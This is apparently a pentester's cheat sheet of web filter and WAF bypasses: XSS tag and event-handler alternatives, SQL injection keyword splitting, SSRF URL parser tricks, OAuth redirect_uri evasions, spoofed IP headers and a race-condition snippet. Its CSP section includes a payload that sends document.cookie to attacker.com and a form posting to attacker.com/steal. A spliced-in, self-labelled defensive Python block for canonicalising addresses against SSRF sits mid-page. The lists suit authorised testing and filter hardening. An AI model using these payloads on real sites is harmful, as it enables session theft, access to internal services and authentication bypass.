Bypasses
WAF evasion, filter bypass, and encoding tricks.
URL Encoding
Double URL Encoding
Unicode Encoding
HTML Entities
Overlong UTF-8
Case Manipulation
Space Alternatives
%09 (tab)
%0a (newline)
%0d (CR)
%0c (form feed)
%20 (space)
+ (URL space)
/**/ (SQL/JS)
/ (in tags: <svg/onload>)
Null Bytes
Newline Injection
IP Obfuscation
127.0.0.1 = 2130706433 (decimal)
127.0.0.1 = 0x7f000001 (hex)
127.0.0.1 = 0177.0.0.1 (octal)
127.0.0.1 = 127.1 (short)
127.0.0.1 = [::1] (IPv6)
127.0.0.1 = [::ffff:127.0.0.1]
Unicode/Homograph
Path Traversal Bypass
XSS Filter Bypass
Tag Alternatives
<script> blocked? Try:
<svg onload=...>
<img src=x onerror=...>
<body onload=...>
<input onfocus=... autofocus>
<details open ontoggle=...>
<marquee onstart=...>
<video><source onerror=...>
<iframe srcdoc="<script>...">
Event Handler Alternatives
onclick ondblclick
onmouseover onmouseenter
onfocus onblur
onerror onload
onanimationend ontransitionend
onbegin onpageshow
Without Parentheses
Keyword Splitting
SQLi Filter Bypass
Comment Injection
Keyword Bypass
UNION → UN/**/ION → /*!UNION*/
SELECT → /*!50000SELECT*/
AND → && → %26%26
OR → || → %7c%7c
Whitespace Bypass
SELECT%09username%09FROM%09users
SELECT%0ausername%0aFROM%0ausers
SELECT/**/username/**/FROM/**/users
SSRF Filter Bypass
Localhost Bypass
URL Parser Confusion
http://evil.com@127.0.0.1/
http://127.0.0.1@evil.com/
http://127.0.0.1#@evil.com
http://127.0.0.1%00@evil.com
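A defender-side counterpart to the IP Obfuscation and URL Parser Confusion lists above, added here as an example and not part of the original page: canonicalise the host the way inet_aton does before any allow/deny decision, and refuse URLs carrying userinfo, instead of string-matching "127.0.0.1". Standard library only; the function names are assumptions of this example.

```python
import ipaddress
from urllib.parse import urlsplit

def _c_int(part: str) -> int:
    # One dotted component, inet_aton style: 0x prefix = hex, leading 0 = octal, else decimal
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)

def canonical_ipv4(host: str) -> ipaddress.IPv4Address:
    """Accept every inet_aton spelling (1-4 components, dec/hex/oct) so '127.1', '0x7f000001',
    '0177.0.0.1' and '2130706433' all become 127.0.0.1; ValueError if host is not an IPv4 literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or "" in parts:
        raise ValueError(host)
    nums = [_c_int(p) for p in parts]
    value = 0
    for n in nums[:-1]:
        if not 0 <= n <= 255:
            raise ValueError(host)
        value = (value << 8) | n
    last_bits = 32 - 8 * (len(nums) - 1)  # the final component fills the remaining bits
    if not 0 <= nums[-1] < (1 << last_bits):
        raise ValueError(host)
    return ipaddress.IPv4Address((value << last_bits) | nums[-1])

def host_to_address(host: str):
    """Literal host -> canonical address; IPv4-mapped IPv6 ([::ffff:127.0.0.1]) is unwrapped."""
    addr = ipaddress.IPv6Address(host) if ":" in host else canonical_ipv4(host)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr

def is_internal(addr) -> bool:
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)

def check_outbound_url(url: str) -> tuple:
    """('deny', why) | ('allow', address) | ('resolve', hostname) for a user-supplied URL."""
    p = urlsplit(url)
    if p.scheme not in ("http", "https"):
        return "deny", "scheme not allowed"
    if p.username is not None or p.password is not None:  # evil.com@127.0.0.1 style confusion
        return "deny", "userinfo not allowed"
    if not p.hostname:
        return "deny", "missing host"
    try:
        addr = host_to_address(p.hostname)
    except ValueError:  # a DNS name: resolve it, run is_internal() on EVERY returned address,
        return "resolve", p.hostname  # then connect to that checked address, not the name again
    return ("deny", f"internal address {addr}") if is_internal(addr) else ("allow", str(addr))
```

The "resolve" verdict is the DNS rebinding case from the next section: the check is only sound if the resolved address is what the client actually connects to.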
DNS Rebinding
Rate Limit Bypass
IP Header Spoofing
X-Forwarded-For: 127.0.0.1
X-Real-IP: 10.0.0.1
X-Originating-IP: 192.168.1.1
True-Client-IP: 172.16.0.1
X-Client-IP: 1.2.3.4
CF-Connecting-IP: 5.6.7.8
X-Remote-IP: 9.10.11.12
X-Remote-Addr: 13.14.15.16
Session/Endpoint Rotation
# Different session per request
# Different casing: /api/user vs /API/USER
# Add trailing: /api/user/
# Add params: /api/user?x=1
Auth Bypass
Response Manipulation
{"success": false} → {"success": true}
{"2fa_required": true} → delete field
HTTP/1.1 401 → HTTP/1.1 200
Parameter Pollution
Null/Blank Values
OAuth/Redirect Bypass
redirect_uri=https://evil.com
redirect_uri=https://legit.com/callback/../../../evil
redirect_uri=https://legit.com@evil.com
redirect_uri=https://legit.com%00.evil.com
redirect_uri=https://lеgit.com (Cyrillic е)
CSP Bypass
Missing Directives
<!-- No object-src -->
<object data="javascript:alert(1)">
<!-- No base-uri -->
<base href="https://attacker.com/">
<!-- No form-action -->
<form action="https://attacker.com/steal">
Exfiltration
<!-- Via img (usually allowed) -->
<img src="https://attacker.com/?c="+document.cookie>
<!-- Via DNS prefetch -->
<link rel="dns-prefetch" href="//data.attacker.com">
HTTP Method Override
Host Header Tricks
Host: evil.com
Host: target.com@evil.com
Host: target.com%00.evil.com
X-Forwarded-Host: evil.com
X-Host: evil.com
Content-Type Tricks
application/json → application/x-www-form-urlencoded
application/xml → text/xml
multipart/form-data → application/json
WAF-Specific
Cloudflare
Akamai
ModSecurity
Race Condition Bypass (2FA/Rate Limit)
# HTTP/2 single-packet
# Turbo Intruder with gate
for i in range(50):
    engine.queue(target.req, gate='race1')
engine.openGate('race1')
Test Systematically
Understand what is blocked, then find the specific bypass. Don't spray payloads at random.
Combine techniques: encoding, case manipulation and comments often work together.